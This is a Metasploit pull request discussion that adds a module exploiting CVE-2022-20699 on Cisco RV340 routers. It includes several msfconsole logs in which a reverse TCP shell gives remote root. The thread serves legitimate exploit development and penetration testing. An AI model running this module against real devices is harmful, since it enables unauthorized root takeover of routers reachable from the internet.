Add sploit for Cisco RV340 SSL VPN - CVE-2022-20699
rapid7/metasploit-framework pull request #16169
Opened 2022-02-11 09:45 UTC by pedrib

This pull request adds an exploit for CVE-2022-20699, a fully remote root, which is exploitable over the Internet, for the Cisco RV 340 VPN Gateway router. This vulnerability was used in Pwn2Own Austin 2021 and presented at OffensiveCon 2022 by me and @rdomanski 

For more info check our advisory.

Note that we need to use our own shellcode, as Metasploit doesn't have ARMLE encoders for null free shellcode. Or are we wrong? We couldn't find a way!

Anyway, running this module results in a beautiful reverse root shell.

2022-02-11 12:39 UTC, TAI-REx commented
Hello anyone! I was tested that exploit on 30 targets and always got ERROR - below
   Exploit failed: IPv6 address specified for IPv4 payload
but I use only IP4.
Thx anyway

2022-02-11 21:08 UTC, gwillcox-r7 commented
@pedrib Given its unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

2022-02-11 21:15 UTC, jbaines-r7 commented
> @pedrib Given its unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

I have one, and planned to test the module out over the weekend.

2022-02-13 06:02 UTC, PolarPeak commented
<img width="524" alt="1644732104(1)" src="https://user-images.githubusercontent.com/44831329/153740940-687db386-a811-4cf5-abdc-1a9d862e884e.png">
Why？

2022-02-13 06:06 UTC, bcoles commented
> <img alt="1644732104(1)" width="524" src="https://user-images.githubusercontent.com/44831329/153740940-687db386-a811-4cf5-abdc-1a9d862e884e.png">
> Why？

Your handler failed to bind.

2022-02-13 19:35 UTC, pedrib commented
Ran a few tests, Metasploit **DOES NOT** produce ARMLE null free shellcode, and there are no encoders to do so, hence we need to stick to our own shellcode.

We also realised that this exploit has a bug in a very specific corner case.
It doesn't work for addresses with a "0" in any of the octets, such as X.0.Y.Z, X.Y.0.Z and X.Y.Z.0 (and combinations of those such as X.0.0.Y, etc) which are valid IP non [rfc1918](https://www.rfc-editor.org/rfc/rfc1918) addresses. For any other IP addresses, it *should* work flawlessly.

We need to modify the shellcode for this specific case, with a similar trick like we do to null the AF_INET struct byte (check the shellcode comment I just added), however bear in mind this while take a while since we're both pretty busy right now.

2022-02-14 15:02 UTC, jbaines-r7 commented
Validated on 1.0.03.20. Quick and clean, nice exploit ❤️ 

```
msf6 > use exploit/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 192.168.1.114
LHOST => 192.168.1.114
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.8:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 10.0.0.8:8443 - 10.0.0.8:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.1:60250 ) at 2022-02-14 06:56:53 -0800

id
uid=0(root) gid=0(root)
```

I'll be happy to test against a wider range of firmware, if desired, once code reviews have been done and the code is in a state that is more likely to be landed.

2022-02-14 17:07 UTC, pedrib commented
@jbaines-r7 good to know! Thanks for testing. First let's try and fix that bug with ".0" addresses, once that is done, we'll need to test again a variety of scenarios to check if there's any breakage.

2022-02-17 14:50 UTC, bwatters-r7 commented on modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
> +    if res && res.code == 200 && res.body.include?('Cisco AnyConnect VPN Client')
Is there a version we can check?  A hardware device name?  This looks like it would pass any Cisco AnyConnect VPN Client.

2022-02-17 15:50 UTC, pedrib commented on modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
> +    # // Original shellcode from Azeria's blog
What do you mean?

2022-02-17 15:51 UTC, pedrib commented on modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
> +    if res && res.code == 200 && res.body.include?('Cisco AnyConnect VPN Client')
I think the best is to include the whole string `The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server`  as SSLVPN appears to be unique to this implementation of Cisco AnyConnect.

2022-02-17 16:07 UTC, pedrib commented
hey all, the shellcode is now fixed! It should work flawless for IP addresses with 0 in any of the 2nd, 3rd or 4th octets. Please test!

2022-02-17 19:41 UTC, pedrib commented on modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
> +    # // Original shellcode from Azeria's blog
This is the source of the shellcode: https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/

2022-03-06 23:17 UTC, pedrib commented
hey everyone, I made a major update - turns out we don't need to flush the caches beforehand, so our shellcode just got smaller. I made some better comments on the module, and added the docs. Please test again!

2022-03-07 13:25 UTC, pedrib commented
we're all green woohoo! ready to merge?

2022-03-14 15:29 UTC, gwillcox-r7 commented
@jbaines-r7 Any chance you can take another look at this given you have a test target? @bwatters-r7 Does the changes look good from your end?

2022-03-14 15:33 UTC, jbaines-r7 commented
Yup! I'll add it to my TODO for this week. I think I'm booked up with writing today :( But tomorrow/Wednesday, I'll work this out again.

2022-03-16 20:43 UTC, jbaines-r7 requested changes

2022-03-16 20:45 UTC, jbaines-r7 commented
The most recent version doesn't appear to be working for me:

```
msf6 > use exploits/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.5:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] 10.0.0.5:8443 - 10.0.0.5:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Exploit completed, but no session was created.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > 
```

10.0.0.5 is the Cisco device on the WAN side and my box (10.0.0.2) should, in theory, be reachable. The version tested was 1.0.03.20.

2022-04-11 14:29 UTC, pedrib commented
@jbaines-r7 sorry I completely missed this, thought I had responded.
The module has a 40% failure rate, can you please try 10 times and check how many fail?

2022-05-11 06:37 UTC, razoidr commented
Hi, could you please share date (are the any?) when the module will be released?

2022-05-11 07:00 UTC, bcoles commented
> Hi, could you please share date (are the any?) when the module will be released?

There's no ETA. In the interim you can download the module files here:

https://github.com/rapid7/metasploit-framework/pull/16169/files

2022-05-11 13:43 UTC, jbaines-r7 commented
Sorry for the delay @pedrib. @gwillcox-r7 this is working. Below there is output and a video. From my point of view, there are minor code changes that would be good but I don't see any reason to hold this up any longer than I've already held it up :shrug: I'll leave my RV340 running so I can retest anything quickly.

```
msf6 > use linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.31
RHOST => 10.0.0.31
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.31:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.28
LHOST => 10.0.0.28
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.28:4444 
[*] 10.0.0.31:8443 - 10.0.0.31:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.31:48738 ) at 2022-05-11 06:31:48 -0700

id
uid=0(root) gid=0(root)
```

https://www.youtube.com/watch?v=w3wh95MndcQ

2022-05-11 14:40 UTC, gwillcox-r7 commented on modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
> +
Fixed in next commit.

2022-05-11 15:16 UTC, merged

2022-05-11 15:17 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added in which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.

2022-05-11 15:36 UTC, pedrib commented
Thanks everyone, you're awesome!